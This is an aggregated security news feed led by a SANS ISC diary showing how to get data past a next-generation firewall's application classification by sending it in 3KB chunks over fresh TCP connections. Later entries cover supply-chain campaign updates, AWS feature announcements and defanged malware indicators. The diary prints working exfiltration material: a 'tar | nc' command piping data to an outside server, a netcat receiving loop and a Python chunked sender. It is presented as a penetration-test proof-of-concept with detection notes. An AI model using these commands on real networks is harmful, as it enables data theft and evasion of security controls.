Application Control Bypass for Data Exfiltration, (Tue, Mar 31st)

This post was originally published on this site

In a cyber incident, most organizations fear data loss (via exfiltration) more than plain data encryption, because they have a good backup policy in place. Once exfiltration happens, they have totally lost control of the stolen data, with all the consequences that implies (PII, credit card numbers, …).

While performing a security assessment of a corporate network, I discovered that a TCP port was open to the wild Internet, even though the audited company had a pretty strong firewall policy. The open port was discovered via a regular port scan. In such a situation, you try to exploit this "hole" in the firewall, so I tried to exfiltrate data through it. It's easy: simulate a server controlled by a threat actor:

root@attacker:~# nc -l -p 12345 >/tmp/victim.tgz

And, from a server on the victim’s network:

root@victim:~# tar czvf - /juicy/data/to/exfiltrate | nc wild.server.com 12345

It worked, but the data transfer failed after approximately 5KB of data sent… weird! Every time, the same situation. I talked to a local network administrator, who said that they have a Palo Alto Networks firewall in place with App-ID enabled on this port.

Note: What I am explaining here is not specific to this brand of firewall. The same issue may apply to any “next-generation” firewall! For example, Check Point firewalls use the App Control blade and Fortinet firewalls use “Application Control”.

App-ID in Palo Alto Networks firewalls is the component performing traffic classification on the protected network(s), regardless of port, protocol, or encryption. Instead of relying on traditional port-based rules (e.g., TCP/80 == HTTP), App-ID analyzes traffic in real time to determine the actual application (e.g., Facebook, Dropbox, custom apps), enabling more granular and accurate security policies. This allows administrators to permit, deny, or control applications directly, apply user-based rules, and enforce security profiles (IPS, URL filtering, etc.) based on the true nature of the traffic rather than superficial indicators like ports. This also prevents well-known protocols from being used on exotic ports (e.g., SSH over 12222).

The main issue with this technique is that enough packets must cross the wire before a reliable classification can be made. So the traffic is always allowed at first and, if something bad is detected, the remaining packets are blocked.

In terms of data volume, there’s no strict fixed threshold, but in practice App-ID usually needs at least the first few KB of application payload to reach a reliable classification. Roughly speaking:

  • <1 KB (or just handshake packets): almost always insufficient → likely unknown or very generic classification
  • ~1–5 KB: basic identification possible for simple or clear-text protocols (HTTP, DNS, some TLS SNI-based detection)
  • ~5–10+ KB: much higher confidence, especially for encrypted or complex applications

That’s why my attempts to exfiltrate data were all blocked after ~5KB.
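Staying below that threshold per connection is the crux of the bypass, but it also shows why the method is slow: every few KB costs a fresh TCP connection. A rough back-of-the-envelope calculation (the 10MB file size is just an illustration):

```python
import math

chunk_size = 3 * 1024          # 3KB per connection, safely under the ~5KB window
file_size = 10 * 1024 * 1024   # hypothetical 10MB file to exfiltrate

# Each chunk needs its own connection, so the chunk count IS the connection count
connections = math.ceil(file_size / chunk_size)
print(connections)  # 3414 separate TCP connections
```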

Can we bypass this? Let’s try the following scenario:

On the external host (managed by me, the "Threat Actor"), let’s run netcat in an infinite loop with a small timeout (because the firewall won’t drop the connection, it just blocks further packets):

i=0
while true; do
    filename=$(printf "/tmp/chunk_%04d.bin" "$i")
    # -w 5: close the listener after 5 seconds of inactivity, since the
    # firewall blocks packets without resetting the connection
    nc -l -p 12345 -v -v -w 5 >"$filename"
    echo "Dumped $filename"
    ((i++))
done

On the victim’s computer, I (vibe-)coded a Python script that performs the following tasks:
– Read a file
– Split it into chunks of 3KB
– Send each chunk over a new TCP connection (with retries in case of failure, of course)
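The Pastebin script below is the authoritative version; purely as an illustration, the core logic could be sketched like this (the constants and helper names are mine, not the original script's):

```python
import socket
import time

CHUNK_SIZE = 3 * 1024  # stay well below App-ID's ~5KB classification window


def split_chunks(data: bytes, size: int = CHUNK_SIZE) -> list:
    """Split a byte string into fixed-size chunks (the last one may be shorter)."""
    return [data[i:i + size] for i in range(0, len(data), size)]


def send_chunk(chunk: bytes, host: str, port: int,
               timeout: float = 5.0, max_retries: int = 10) -> bool:
    """Send one chunk over a fresh TCP connection, retrying on failure."""
    for attempt in range(1, max_retries + 1):
        try:
            with socket.create_connection((host, port), timeout=timeout) as s:
                s.sendall(chunk)
            return True
        except OSError:
            time.sleep(1)  # give the remote nc loop time to restart
    return False
```

Each chunk travels over its own short-lived connection, so no single flow ever accumulates enough payload for the firewall to classify.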

The code is available on Pastebin[1]. Example:

root@victim:~# sha256sum data.zip
955587e24628dc46c85a7635cae888832113e86e6870cba0312591c44acf9833  data.zip
root@victim:~# python3 send_file.py data.zip wild.server.com 12345
File: 'data.zip' (359370 bytes) -> 1177 chunk(s) of up to 3072 bytes.
Destination: wild.server.com:12345  (timeout=5s, max_retries=10)

  Chunk 1/1177 sent successfully (attempt 1).
  Chunk 2/1177 sent successfully (attempt 1).
  Chunk 3/1177 sent successfully (attempt 1).
  Chunk 4/1177 sent successfully (attempt 1).
  Chunk 5/1177 sent successfully (attempt 1).
  Chunk 6/1177 sent successfully (attempt 1).
  Chunk 7/1177 sent successfully (attempt 1).
  Chunk 8/1177 sent successfully (attempt 1).
  Chunk 9/1177 sent successfully (attempt 1).
  Chunk 10/1177 sent successfully (attempt 1).
  Chunk 11/1177 sent successfully (attempt 1).
  Chunk 12/1177 sent successfully (attempt 1).
  [...]

And on the remote side, the chunks are created; you just need to rebuild the original file:

root@attacker:~# cat /tmp/chunk_0* >victim.zip
root@attacker:~# sha256sum victim.zip
955587e24628dc46c85a7635cae888832113e86e6870cba0312591c44acf9833  victim.zip

The file has been successfully exfiltrated (the SHA256 hashes are identical)! Of course, it's slow, but it does not generate bandwidth spikes that could reveal a huge amount of data being exfiltrated!

This technique worked for me with a file of a few megabytes. It is more of a proof-of-concept, because firewalls may implement additional detection controls. For example, this technique is easy to detect due to the high number of small TCP connections, which may look like malware beaconing. It could also be useful to encrypt your data, because packets could be flagged by the IDS component of the firewall…

[1] https://pastebin.com/Ct9ePEiN

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

TeamPCP Supply Chain Campaign: Update 004 – Databricks Investigating Alleged Compromise, TeamPCP Runs Dual Ransomware Operations, and AstraZeneca Data Released, (Mon, Mar 30th)


This is the fourth update to the TeamPCP supply chain campaign threat intelligence report, "When the Security Scanner Became the Weapon" (v3.0, March 25, 2026). Update 003 covered developments through March 28, including the first 48-hour pause in new compromises and the campaign's shift to monetization. This update consolidates intelligence from March 28-30, 2026 — two days since our last update.

DShield (Cowrie) Honeypot Stats and When Sessions Disconnect, (Mon, Mar 30th)


A lot of the information seen on DShield honeypots [1] is repeated bot traffic, especially when looking at the Cowrie [2] telnet and SSH sessions. However, how long a session lasts, how many commands are run per session and what the last commands run before a session disconnects can vary. Some of this information could help indicate whether a session is automated and if a honeypot was fingerprinted. This information can also be used to find more interesting honeypot sessions.

TeamPCP Supply Chain Campaign: Update 003 – Operational Tempo Shift as Campaign Enters Monetization Phase With No New Compromises in 48 Hours, (Sat, Mar 28th)


This is the third update to the TeamPCP supply chain campaign threat intelligence report, "When the Security Scanner Became the Weapon" (v3.0, March 25, 2026). Update 002 covered developments through March 27, including the Telnyx PyPI compromise and Vect ransomware partnership. This update covers developments from March 27-28, 2026.

TeamPCP Supply Chain Campaign: Update 002 – Telnyx PyPI Compromise, Vect Ransomware Mass Affiliate Program, and First Named Victim Claim, (Fri, Mar 27th)


This is the second update to the TeamPCP supply chain campaign threat intelligence report, "When the Security Scanner Became the Weapon" (v3.0, March 25, 2026). Update 001 covered developments through March 26. This update covers developments from March 26-27, 2026.

Customize your AWS Management Console experience with visual settings including account color, region and service visibility


In August 2025, we introduced the AWS User Experience Customization (UXC) capability to tailor user interfaces (UIs) to meet your specific needs and complete your tasks efficiently. With this capability, your account administrator can customize some UI components of the AWS Management Console, such as assigning a color to an AWS account for easier identification.

Today, we’re announcing additional customization capability in UXC that enables selective display of relevant AWS Regions and services for your team members. By hiding unused Regions and services, you can reduce cognitive load and eliminate unnecessary clicks and scrolling, helping you focus better and work faster. With this launch, we offer the ability to customize account color, Region, and service visibility together.

Categorize account by color
You can set a color for your accounts to visually distinguish between them. To get started, sign in to the AWS Management Console and choose your account name on the navigation bar. If your account color isn’t set yet, choose Account to set it.

In the Account display settings, select your preferred account color and choose Update. You can see the chosen color in the navigation bar.

By changing the account color, you can clearly distinguish the account’s purpose. For example, you can use orange for development accounts, light blue for test accounts, and red for production accounts.

Customize Regions and services visibility
You can control which AWS Regions appear in the Region selector or which AWS services appear in the console navigation. In other words, you can choose to show only the Regions and services that are relevant to your account.

To get started, choose the gear icon on the navigation bar and choose See all user settings. If you are in an administrator role, you can see a new Account settings tab in the unified settings. If you have not configured a setting, all Regions and services are visible.

To set visible Regions, choose Edit in the Visible Regions section. Set the visibility to All available Regions or Select Regions and configure your list. Choose Save changes.

After configuring the visible Regions setting, you will find only the selected Regions in the Region selector on the navigation bar in the console.

You can also set visible services in the same way. Search or select services from the category. I used the Popular services category to select my favorites. When you finish selection, choose Save changes.

After configuring the visible services setting, you will find only the selected services in the All services menu on the navigation bar.

When you search for a service name in the search bar, only the selected services are offered.

The Regions and services visibility settings control only the appearance of services and Regions in the console. They don’t restrict access through the AWS Command Line Interface (AWS CLI), AWS SDKs, AWS APIs, or Amazon Q Developer.

You can also manage these account customization settings programmatically with the new visibleServices and visibleRegions parameters. For example, you can use the following AWS CloudFormation sample template:

AWSTemplateFormatVersion: "2010-09-09"
Description: Customize AWS Console appearance for this account

Resources:
  AccountCustomization:
    Type: AWS::UXC::AccountCustomization
    Properties:
      AccountColor: red
      VisibleServices:
        - s3
        - ec2
        - lambda
      VisibleRegions:
        - us-east-1
        - us-west-2

And you can deploy your CloudFormation template:

$ aws cloudformation deploy \
  --template-file account-customization.yaml \
  --stack-name my-account-customization

To learn more, visit the AWS User Experience Customization API Reference and AWS CloudFormation template reference.

Give it a try in the AWS Management Console today and provide feedback by selecting the Feedback link at the bottom of the console, posting to the AWS re:Post forum for the AWS Management Console, or reaching out to your AWS Support contacts.

Channy

TeamPCP Supply Chain Campaign: Update 001 – Checkmarx Scope Wider Than Reported, CISA KEV Entry, and Detection Tools Available, (Thu, Mar 26th)


This is the first update to the TeamPCP supply chain campaign threat intelligence report, “When the Security Scanner Became the Weapon” (v3.0, March 25, 2026). That report covers the full campaign from the February 28 initial access through the March 24 LiteLLM PyPI compromise. This update covers developments since publication.

Apple Patches (almost) everything again. March 2026 edition., (Wed, Mar 25th)


Apple released the next version of its operating system, patching 85 different vulnerabilities across all of them. None of the vulnerabilities are currently being exploited. The last three macOS "generations" are covered, as are the last two versions of iOS/iPadOS. For tvOS, watchOS, and visionOS, only the current version received patches. This update also includes the recently released Background Security Improvements. Some older watchOS versions received updates, but these updates do not address any security issues.

Announcing Amazon Aurora PostgreSQL serverless database creation in seconds


At re:Invent 2025, Colin Lazier, vice president of databases at AWS, emphasized the importance of building at the speed of an idea—enabling rapid progress from concept to running application. Customers can already create production-ready Amazon DynamoDB tables and Amazon Aurora DSQL databases in seconds. He previewed creating an Amazon Aurora serverless database with the same speed, and customers have since requested rapid access to this capability.

Today, we’re announcing the general availability of a new express configuration for Amazon Aurora PostgreSQL, a streamlined database creation experience with preconfigured defaults designed to help you get started in seconds.

With only two clicks, you can have an Aurora PostgreSQL serverless database ready to use in seconds. You have the flexibility to modify certain settings during and after database creation in the new configuration. For example, you can change the capacity range for the serverless instance at the time of creation, or add read replicas and modify parameter groups after the database is created. Aurora clusters with express configuration are created without an Amazon Virtual Private Cloud (Amazon VPC) network and include an internet access gateway for secure connections from your favorite development tools – no VPN or AWS Direct Connect required. Express configuration also sets up AWS Identity and Access Management (IAM) authentication for your administrator user by default, enabling passwordless database authentication from the beginning without additional configuration.

After it’s created, you have access to features available for Aurora PostgreSQL serverless, such as deploying additional read replicas for high availability and automated failover capabilities. This launch also introduces a new internet access gateway routing layer for Aurora. Your new serverless instance comes enabled by default with this feature, which allows your applications to connect securely from anywhere in the world through the internet using the PostgreSQL wire protocol from a wide range of developer tools. This gateway is distributed across multiple Availability Zones, offering the same level of high availability as your Aurora cluster.

Creating and connecting to Aurora in seconds means fundamentally rethinking how you get started. We launched multiple capabilities that work together to help you onboard and run your application with Aurora. Aurora is now available on the AWS Free Tier, so you can gain hands-on experience with Aurora at no upfront cost. After it’s created, you can directly query an Aurora database in AWS CloudShell or by using programming languages and developer tools through a new internet-accessible routing component for Aurora. With integrations such as v0 by Vercel, you can use natural language to start building your application with the features and benefits of Aurora.

Create an Aurora PostgreSQL serverless database in seconds
To get started, go to the Aurora and RDS console and in the navigation pane, choose Dashboard. Then, choose Create with a rocket icon.

Review pre-configured settings in the Create with express configuration dialog box. You can modify the DB cluster identifier or the capacity range as needed. Choose Create database.

You can also use the AWS Command Line Interface (AWS CLI) or AWS SDKs with the parameter --express-configuration to create both a cluster and an instance within the cluster with a single API call, making it ready for running queries in seconds. To learn more, visit Creating an Aurora PostgreSQL DB cluster with express configuration.

Here is a CLI command to create the cluster:

$ aws rds create-db-cluster --db-cluster-identifier channy-express-db \
    --engine aurora-postgresql \
    --with-express-configuration

Your Aurora PostgreSQL serverless database should be ready in seconds. A success banner confirms the creation, and the database status changes to Available.

After your database is ready, go to the Connectivity & security tab to access three connection options. When connecting through SDKs, APIs, or third-party tools including agents, choose Code snippets. You can choose various programming languages such as .NET, Golang, JDBC, Node.js, PHP, PSQL, Python, and TypeScript. You can paste the code from each step into your tool and run the commands.

For example, the following Python code is dynamically generated to reflect the authentication configuration:

import psycopg2
import boto3

auth_token = boto3.client('rds', region_name='ap-south-1').generate_db_auth_token(
    DBHostname='channy-express-db-instance-1.abcdef.ap-south-1.rds.amazonaws.com',
    Port=5432,
    DBUsername='postgres',
    Region='ap-south-1'
)

conn = None
try:
    conn = psycopg2.connect(
        host='channy-express-db-instance-1.abcdef.ap-south-1.rds.amazonaws.com',
        port=5432,
        database='postgres',
        user='postgres',
        password=auth_token,
        sslmode='require'
    )
    cur = conn.cursor()
    cur.execute('SELECT version();')
    print(cur.fetchone()[0])
    cur.close()
except Exception as e:
    print(f"Database error: {e}")
    raise
finally:
    if conn:
        conn.close()

And the equivalent Node.js code snippet:

const { Client } = require('pg');
const AWS = require('aws-sdk');
AWS.config.update({ region: 'ap-south-1' });

async function main() {
  let password = '';
  const signer = new AWS.RDS.Signer({ region: 'ap-south-1', hostname: 'channy-express-db-instance-1.abcdef.ap-south-1.rds.amazonaws.com', port: 5432, username: 'postgres' });
  password = signer.getAuthToken({});

  const client = new Client({
    host: 'channy-express-db-instance-1.abcdef.ap-south-1.rds.amazonaws.com',
    port: 5432,
    database: 'postgres',
    user: 'postgres',
    password,
    ssl: { rejectUnauthorized: false }
  });

  try {
    await client.connect();
    const res = await client.query('SELECT version()');
    console.log(res.rows[0].version);
  } catch (error) {
    console.error('Database error:', error);
    throw error;
  } finally {
    await client.end();
  }
}
main().catch(console.error);

Choose CloudShell for quick access to the AWS CLI, launched directly from the console. When you choose Launch CloudShell, the command is pre-populated with the relevant information to connect to your specific cluster. After connecting to the shell, you should see the psql login and the postgres=> prompt to run SQL commands.

You can also choose Endpoints to use tools that only support username and password credentials, such as pgAdmin. When you choose Get token, you use an AWS Identity and Access Management (IAM) authentication token generated by the utility in the password field. The token is generated for the master username that you set up at the time of creating the database. The token is valid for 15 minutes at a time. If the tool you’re using terminates the connection, you will need to generate the token again.

Building your application faster with Aurora databases
At re:Invent 2025, we announced enhancements to the AWS Free Tier program, offering up to $200 in AWS credits that can be used across AWS services. You’ll receive $100 in AWS credits upon sign-up and can earn an additional $100 in credits by using services such as Amazon Relational Database Service (Amazon RDS), AWS Lambda, and Amazon Bedrock. In addition, Amazon Aurora is now available across a broad set of eligible Free Tier database services.

Developers are embracing platforms such as Vercel, where natural language is all it takes to build production-ready applications. We announced integrations with Vercel Marketplace to create and connect to an AWS database directly from Vercel in seconds and v0 by Vercel, an AI-powered tool that transforms your ideas into production-ready, full-stack web applications in minutes. It includes Aurora PostgreSQL, Aurora DSQL, and DynamoDB databases. You can also connect your existing databases created through express configuration with Vercel. To learn more, visit AWS for Vercel.

Like Vercel, we’re bringing our databases seamlessly into their experiences and are integrating directly with widely adopted frameworks, AI assistant coding tools, environments, and developer tools, all to unlock your ability to build at the speed of an idea.

We introduced Aurora PostgreSQL integration with Kiro powers, which developers can use to build Aurora PostgreSQL backed applications faster with AI agent-assisted development through Kiro. You can use Kiro power for Aurora PostgreSQL within Kiro IDE and from the Kiro powers webpage for one-click installation. To learn more about this Kiro Power, read Introducing Amazon Aurora powers for Kiro and Amazon Aurora Postgres MCP Server.

Now available
You can create an Aurora PostgreSQL serverless database in seconds today in all AWS commercial Regions. For Regional availability and a future roadmap, visit the AWS Capabilities by Region.

You pay only for capacity consumed based on Aurora Capacity Units (ACUs) billed per second from zero capacity, which automatically starts up, shuts down, and scales capacity up or down based on your application’s needs. To learn more, visit the Amazon Aurora Pricing page.

Give it a try in the Aurora and RDS console and send feedback to AWS re:Post for Aurora PostgreSQL or through your usual AWS Support contacts.

Channy

SmartApeSG campaign pushes Remcos RAT, NetSupport RAT, StealC, and Sectop RAT (ArechClient2), (Wed, Mar 25th)


Introduction

This diary provides indicators from the SmartApeSG (ZPHP, HANEYMANEY) campaign I saw on Tuesday, 2026-03-24. SmartApeSG is one of many campaigns that use the ClickFix technique. This past week, I've seen NetSupport RAT as follow-up malware from Remcos RAT pushed by this campaign. But this time, I also saw indicators for StealC malware and Sectop RAT (ArechClient2) after NetSupport RAT appeared on my infected lab host.

Not all of the follow-up malware appears shortly after the initial Remcos RAT malware. Here's the timeline for malware from my SmartApeSG activity on Tuesday 2026-03-24:

  • 17:11 UTC – Ran ClickFix script from SmartApeSG fake CAPTCHA page
  • 17:12 UTC – Remcos RAT post-infection traffic starts
  • 17:16 UTC – NetSupport RAT post-infection traffic starts
  • 18:18 UTC – StealC post-infection traffic starts
  • 19:36 UTC – Sectop RAT post-infection traffic starts

While the NetSupport RAT activity happened approximately 4 minutes after the Remcos RAT activity, the StealC traffic didn't happen until approximately 1 hour after the NetSupport RAT activity started. And the traffic for Sectop RAT happened approximately 1 hour and 18 minutes after the StealC activity started.

Images from the infection


Shown above: Page from a legitimate but compromised website with injected script for the fake CAPTCHA page.


Shown above: Fake CAPTCHA page with ClickFix instructions. This image shows the malicious script injected into a user's clipboard.


Shown above: Traffic from the infection filtered in Wireshark.

Indicators of Compromise

Associated domains and IP addresses:

  • fresicrto[.]top – Domain for server hosting fake CAPTCHA page
  • urotypos[.]com – Called by ClickFix instructions, this domain is for a server hosting the initial malware
  • 95.142.45[.]231:443 – Remcos RAT C2 server
  • 185.163.47[.]220:443 – NetSupport RAT C2 server
  • 89.46.38[.]100:80 – StealC C2 server
  • 195.85.115[.]11:9000 – Sectop RAT (ArechClient2) C2 server

Example of HTA file retrieved by ClickFix script:

  • SHA256 hash: 212d8007a7ce374d38949cf54d80133bd69338131670282008940f1995d7a720
  • File size: 47,714 bytes
  • File type: HTML document text, ASCII text, with very long lines (6272)
  • Retrieved from: hxxps[:]//urotypos[.]com/cd/temp
  • Saved location: C:\Users\[username]\AppData\Local\post.hta
  • Note: ClickFix script deletes the file after retrieving and running it

Example of ZIP archive for Remcos RAT retrieved by the above HTA file:

ZIP archive containing NetSupport RAT package:

RAR archive for StealC package:

RAR archive for Sectop RAT (ArechClient2) package:

Final words

The archive files for Remcos RAT, StealC and Sectop RAT are packages that use legitimate EXE files to side-load malicious DLLs (a technique called DLL side-loading). The NetSupport RAT package is a legitimate tool that's configured to use an attacker-controlled server.

As always, the files, URLs and domains for SmartApeSG activity change on a near-daily basis. And names of the HTA file and ZIP archive for Remcos RAT are different for each infection. The indicators described in this article may no longer be current as you read this. However, this activity confirms that the SmartApeSG campaign can push a variety of malware after an initial infection.


Bradley Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.